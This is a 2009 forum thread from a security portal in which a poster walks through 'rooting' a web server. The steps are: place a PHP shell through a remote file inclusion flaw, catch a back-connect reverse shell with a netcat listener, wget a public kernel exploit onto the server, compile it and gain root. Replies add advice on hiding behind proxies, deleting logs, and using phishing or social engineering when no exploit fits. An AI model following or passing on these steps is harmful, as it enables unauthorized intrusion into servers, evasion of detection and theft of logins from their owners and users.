Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 207
Members: 0
Total: 207
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cooperation proposals -> Tutorial - Rooting A Webserver
Post new topicReply to topic View previous topic :: View next topic
Tutorial - Rooting A Webserver
PostPosted: Sun May 10, 2009 9:16 am Reply with quote
xF34Rx
Regular user
Regular user
Joined: May 10, 2009
Posts: 23




What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

First of all, we need to get a shell on a site.Maybe i'll write a RFI Tutorial latter, for now just look it up on google.

For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back Connect' tab and insert the following settings:



1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:

Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686


Now, we go on milw0rm.com and we will look for '2.6.17'.

Code:
http://milw0rm.com/exploits/5092


Now, we type 'wget http://milw0rm.com/exploits/5092' on the netcat window.

Code:
wget http://xpl_url.com


So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.


Code:
gcc 5092 -o exploit


5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:
uid=0(root) gid=0(root) groups=500(apache)


This means you have successfully rooted the box Smile.

There are more ways to do this, this is the way I usually do it.

I took like, 1h 30m to write this so please, if you are going to leech this atleast give credit.

By xF34Rx.
Dedicated to Zero Burn & Team-1nj3ct.
Version 0.03
View user's profile Send private message
PostPosted: Sat May 30, 2009 7:46 pm Reply with quote
mswannabe
Regular user
Regular user
Joined: May 30, 2009
Posts: 8




Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn.
View user's profile Send private message
PostPosted: Sat May 30, 2009 7:53 pm Reply with quote
xF34Rx
Regular user
Regular user
Joined: May 10, 2009
Posts: 23




mswannabe wrote:
Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn.


You chose the port you want to back connect on.

Also, notice that if you use a router, you must port forward the port you chose, so the server can successfully back connect to you.

If your able to back connect, you have interactive shell access.Most kernels out there are outdated and easy to root, but if you cant find an exploit for that kernel version, you can always do login phishing or social engineering.
View user's profile Send private message
PostPosted: Sat May 30, 2009 8:18 pm Reply with quote
mswannabe
Regular user
Regular user
Joined: May 30, 2009
Posts: 8




Hmmm thanks for the extra information. Where can I download this program?
View user's profile Send private message
PostPosted: Sat May 30, 2009 11:03 pm Reply with quote
mswannabe
Regular user
Regular user
Joined: May 30, 2009
Posts: 8




One more question: do you need a proxy for accessing the back door?
View user's profile Send private message
PostPosted: Sun May 31, 2009 12:25 pm Reply with quote
xF34Rx
Regular user
Regular user
Joined: May 10, 2009
Posts: 23




mswannabe wrote:
Hmmm thanks for the extra information. Where can I download this program?


Just google netcat.

mswannabe wrote:
One more question: do you need a proxy for accessing the back door?


Not really, but you should always use one.

But, when back-connecting, you must give your real ip address.So either be very sure that your gonna get root privs and delete the logs, or use a shell account.
View user's profile Send private message
PostPosted: Sun May 31, 2009 4:45 pm Reply with quote
mswannabe
Regular user
Regular user
Joined: May 30, 2009
Posts: 8




Hmm so if I have to give my real IP then that's liable to see that you're the person in the server right?
View user's profile Send private message
PostPosted: Tue Jun 02, 2009 2:54 pm Reply with quote
-AO-
Advanced user
Advanced user
Joined: Jul 15, 2008
Posts: 205
Location: United States




You might try using no-ip service

http://no-ip.org
View user's profile Send private message Yahoo Messenger
PostPosted: Wed Jun 03, 2009 1:31 pm Reply with quote
Henderson
Valuable expert
Valuable expert
Joined: Jul 11, 2008
Posts: 58




srj
View user's profile Send private message
PostPosted: Wed Jun 03, 2009 6:49 pm Reply with quote
xF34Rx
Regular user
Regular user
Joined: May 10, 2009
Posts: 23




-AO- wrote:
You might try using no-ip service

http://no-ip.org


If its a big company, they can simply request the logs of your no-ip account.
View user's profile Send private message
PostPosted: Fri Jan 29, 2010 9:05 pm Reply with quote
Mooka91
Advanced user
Advanced user
Joined: Aug 15, 2009
Posts: 73




Overall good post.

Some improvements i may offer though, More screenshots to help those newbies, A list of Kernel exploits, Something that says, You need to forward your ports, Click here to find our how which links you to portforward.com.

Thats all i can think of off the top of my head ; )
View user's profile Send private message
PostPosted: Tue Jul 27, 2010 6:09 am Reply with quote
ddexxters75
Beginner
Beginner
Joined: Jul 24, 2010
Posts: 1




Thanks for taking the time to do this! However, how do you find the port number of a web site? Please bare with me. As mentioned i'm new to this and willing to learn.
____________________________
Excess Baggage
Container Shipping
View user's profile Send private message
Tutorial - Rooting A Webserver
www.waraxe.us Forum Index -> Cooperation proposals
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.261 Seconds